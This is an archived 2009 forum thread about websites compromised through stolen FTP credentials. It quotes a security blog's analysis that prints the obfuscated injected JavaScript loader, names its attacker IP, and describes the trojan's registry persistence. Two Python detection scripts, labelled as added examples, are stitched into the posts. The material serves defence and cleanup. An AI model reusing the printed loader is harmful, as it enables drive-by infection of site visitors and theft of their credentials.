
js script - for Juliet

Discussion in 'Malware and Virus Removal Archive' started by Geri, 2009/03/24.

  1. 2009/04/09
    wzd

    wzd Inactive

    Joined:
    2009/03/29
    Messages:
    6
    Likes Received:
    0
    Yes, and I just posted in threads I found after our site got hacked. I just wanted to add traffic mentioning the IP addy in case more hit the same problem. And since the number of hits on a Google search for it has jumped from 42 to 355, I'd say others are hitting it too. Probably no reason to post over there too; people will find this.

    It sounds like you got a different method of infection. For us it happened while no one was actually logged in (based on talking to them), but a different machine did the login using a user's credentials (based on the FTP log). The FTP log had the IP address and user info in it, and that's how we determined it. But it sounds like you verified it was her logging in and not just her login being used, so that is a little different. I'd agree you need to have her clean up the machine before allowing access!
     
    wzd,
    #21
  2. 2009/04/10
    alphonse777

    alphonse777 Inactive

    Joined:
    2009/04/10
    Messages:
    3
    Likes Received:
    0
    Hello all,

    I got exactly the same web site hack on all the websites I was taking care of.
    I think that the hacker could grab the password XML file from FileZilla...
    I'm pretty sure... but I don't know how it could happen...
    It happened twice on a web site, and also on a web site where I entered the password without saving it!
    This is incredible.

    With Sysinternals tools, I could figure out (and NOT A single spyware or antivirus program could) the virus's actions; this is similar to this:

    http://www.threatexpert.com/report.aspx?md5=791509d03706cbc8883536b5131341d4

    I had Acrobat 7.1, which I have upgraded to 9.1.
    Changed all system passwords.

    I'm watching my database registry .... but I'm not sure I have killed the trojan...


    if someone finds HOW THE FTP PASSWORDS were hacked ... this would be great.
    I'm suspecting a keyboard hook also...

    Al.
     

  4. 2009/04/10
    alphonse777

    alphonse777 Inactive

    Joined:
    2009/04/10
    Messages:
    3
    Likes Received:
    0
    (I have written a long message before this one?? Where is it?...)
    Another thing:
    The FTP log from the server proved that it was not my machine that did the HTML code injection. I'm 100% sure.
    AL.

    Hello all,

    I have the same issue, all my web sites were hacked...

    After hours of work,
    I have discovered a Trojan called
    Spy-Agent.Cm or
    Win32/Delf.OEX

    I think it can be responsible for all our annoyances...
    Al.
     
    Last edited: 2009/04/10
  5. 2009/04/10
    Christer

    Christer Geek Member Staff

    Joined:
    2002/12/17
    Messages:
    6,585
    Likes Received:
    74
    Hello alphonse777,
    welcome to WindowsBBS ... :) ... !

    Posts containing links from new members require moderation. You will have to wait until someone in "Malware and Virus Removal" approves your post and link.

    Read the posting rules for further information.

    Christer
     
  6. 2009/04/17
    noahdfear

    noahdfear Inactive

    Joined:
    2003/04/06
    Messages:
    12,178
    Likes Received:
    15
    Please get an export of the following registry key from any suspected machine and post it here.

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32

    As shown in the ThreatExpert link from alphonse777, the culprit may show up there.
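    One way to triage the export noahdfear asks for, as an added example (not code from this thread): it parses a .reg export of the Drivers32 key and flags any value whose data carries a full path or an extension other than the usual driver types, which is how a randomly named file registered as "aux" stands out. The sample export, the wdmaud.drv baseline and the set of normal extensions are constructed assumptions.

    ```python
    import re

    # Constructed sample of a Drivers32 export as regedit writes it (not from a real
    # machine).  "aux1" mimics the random-name-in-%windir% pattern from the thread.
    SAMPLE_REG = r'''Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
    "aux"="wdmaud.drv"
    "midi"="wdmaud.drv"
    "aux1"="C:\\WINDOWS\\flvc.ebi"
    "wave"="wdmaud.drv"
    '''

    DRIVERS32_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32"
    # One "name"="data" line; data may contain \\ and \" escapes as .reg files write them.
    VALUE_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')
    # Extensions normally registered under Drivers32 (assumption used by the heuristic).
    NORMAL_EXT = {".drv", ".acm", ".dll", ".ax", ".vcm"}

    def parse_reg(text):
        """Return {value_name: data} for the Drivers32 key in a .reg export."""
        values, in_key = {}, False
        for line in text.splitlines():
            line = line.strip()
            if line.startswith("["):
                in_key = line.strip("[]").lower() == DRIVERS32_KEY.lower()
                continue
            m = VALUE_RE.match(line) if in_key else None
            if m:
                # undo the .reg escaping: "\\" -> "\", "\"" -> '"'
                values[m.group(1)] = re.sub(r"\\(.)", r"\1", m.group(2))
        return values

    def suspicious(values):
        """Flag entries that point at a full path or at a non-driver extension."""
        flagged = []
        for name, data in values.items():
            ext = data.lower()[data.rfind("."):] if "." in data else ""
            if "\\" in data or ":" in data or ext not in NORMAL_EXT:
                flagged.append((name, data))
        return flagged

    if __name__ == "__main__":
        for name, data in suspicious(parse_reg(SAMPLE_REG)):
            print(f"suspicious Drivers32 entry: {name!r} -> {data}")
    ```

    Point it at a real export by reading the file (regedit writes UTF-16, so open it with encoding="utf-16") and passing the text to parse_reg.
    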

     
  7. 2009/04/18
    alphonse777

    alphonse777 Inactive

    Joined:
    2009/04/10
    Messages:
    3
    Likes Received:
    0
    Hello all,
    I think I got contaminated by a trojan called Trojan.SilentBanker.
    I've got many signs that prove that...
    I'm just amazed at how this trojan got installed with the firewall and ESET antivirus enabled.

    Thanks
     
  8. 2009/04/18
    backroad

    backroad Inactive

    Joined:
    2009/04/08
    Messages:
    8
    Likes Received:
    0
    94.247.2.195

    Here are some interesting notes I found at
    http://blog.scansafe.com/
    This hints at a lot of the vague clues I noticed, including the unfamiliar php files I found on the web site and the possibility of more than one form of compromise.


    "
    Malware Manipulating Google SERPs
    Over the past few months, ScanSafe has been tracking malware that incorporates a couple of crafty Black Hat SEO techniques to manipulate Google SERPs. Because of the nature of how the attacks work, the rate of the attacks has been increasing exponentially and has now grown considerably large.

    The attacks are perpetuated through compromise of legitimate sites. Once a visitor to a compromised site has been infected with the trojan, any sites that they manage will then also be susceptible to compromise. (One component of the malware is its ability to monitor traffic and steal FTP credentials). Though stolen FTP credentials appear to be the most common method employed in these particular attacks, compromise can also occur via standard methods, such as poor configuration settings, vulnerable Web apps, and so on.

    The malicious script embedded during the compromise is usually placed in other .js or .php files rather than directly on the default home page for the site. For example, menu files, login pages, and similar types of content feeds are generally targeted. This technique could enable the signs of the compromise to bypass casual observation. The embedded script is as follows:

    document.write(unescape('%3CRhSsc5uriptUd%20sPQrCRc%3D5u%2F5u%2F9CR4sW%2E5u24R6M7GS%2EPQ2PQ%2E1Ud95%2FsWj5uqusWeUdrsWy%2EGSjs%3E%3CCR%2FsRhScR6Mript%3E').replace(/R6M|RhS|GS|5u|Ud|PQ|CR|sW/g," "));

    This leads to 94.247.2.195 which resolves to hs.2-195.zlkon.lv, hosted by Datoru Express Serviss, Latvia. Of course, physical host location and whois information may bear little resemblance to the actual attackers.

    When Web surfers visit one of these compromised sites, the embedded script leads to a cocktail of PDF, Flash, and MDAC exploits which result in the creation of an executable (typically named iexplorer.exe) and two batch files (C:\_.bat and C:\_.t). The batch files ensure the executable gets moved and renamed. The malware's final filename and location are random, examples include:

    %windir%\flvc.ebi
    %windir%\bpagokx.nmy
    %windir%\system32\oka.cdq

    The file is loaded by registering it as an auxiliary sound driver:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
    "aux"="<path and filename of trojan>"

    This causes the malware to load when any sound-enabled application, i.e. any browser, is launched. The malware monitors traffic to and from the browser (and thus enables the malware to steal usernames and passwords and other sensitive information). When infected users perform certain Google searches, the search engine results page (SERP) is manipulated so that affiliate links are replacing the legitimate links. Cookie stuffing is used so that the links presented appear normal, i.e. the affiliate ID is not exposed, but the rogue affiliate gets full credit for the unintended click through.

    Given the escalation of these attacks, it appears that someone is making a great deal of money.
    "

    ----------------------------------
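    For a site owner checking their own .js/.php files for the loader the quoted post describes, here is an added example (not code from this thread or from ScanSafe): it matches the document.write(unescape('...').replace(/.../g,"...")) shape, replays the decode steps the loader itself performs, and reports the remote script the decoded tag would load, so the host can be blocked and the file cleaned. The sample menu script, its junk tokens and the 192.0.2.10 address are constructed, not the thread's real values.

    ```python
    import re
    from urllib.parse import unquote

    # Constructed sample: a legitimate menu script with the loader appended.  The
    # encoded text decodes to a tag loading from the documentation address 192.0.2.10.
    SAMPLE_JS = (
        "function showMenu(id) { document.getElementById(id).style.display = 'block'; }\n"
        "document.write(unescape('%3CsZqcriptKx%20srWmc%3D%2FZq%2F192Kx%2E0%2E2Wm%2E10"
        "%2FjqZquery%2EjsKx%3E%3C%2FscWmript%3E').replace(/Zq|Kx|Wm/g,\"\"));\n"
    )

    # Loader shape from the post: percent-encoded text, then a global regex replace
    # that strips the junk tokens.  Captures: encoded text, token alternation, replacement.
    LOADER_RE = re.compile(
        r"document\.write\(unescape\('([^']+)'\)"
        r'\.replace\(/([^/]+)/g\s*,\s*"([^"]*)"\)\)'
    )
    SRC_RE = re.compile(r"""<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)

    def decode_loader(encoded, tokens, repl):
        """Replay the loader's own steps: percent-decode, then strip the junk tokens."""
        return re.sub(tokens, repl, unquote(encoded))

    def find_loaders(text):
        """Return (decoded_markup, script_src) for each loader found in text."""
        hits = []
        for m in LOADER_RE.finditer(text):
            decoded = decode_loader(m.group(1), m.group(2), m.group(3))
            src = SRC_RE.search(decoded)
            hits.append((decoded, src.group(1) if src else None))
        return hits

    def scan_paths(paths):
        """Map each .js/.php/.html file (pathlib.Path objects) to the loaders it contains."""
        report = {}
        for p in paths:
            if p.suffix.lower() in {".js", ".php", ".html", ".htm"}:
                hits = find_loaders(p.read_text(errors="ignore"))
                if hits:
                    report[str(p)] = hits
        return report

    if __name__ == "__main__":
        for decoded, src in find_loaders(SAMPLE_JS):
            print("injected loader decodes to:", decoded)
            print("remote script it would load:", src)
    ```

    To sweep a downloaded copy of a site, call scan_paths(Path(webroot).rglob("*")) and review every reported src before restoring clean files from a known-good backup.
    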
     
  9. 2009/04/18
    wzd

    wzd Inactive

    Joined:
    2009/03/29
    Messages:
    6
    Likes Received:
    0
    Thanks Backroad! That is exactly what hit us, and now I have an easy way to check users' machines to see if they are compromised. Thanks a lot!!
     
    wzd,
    #28
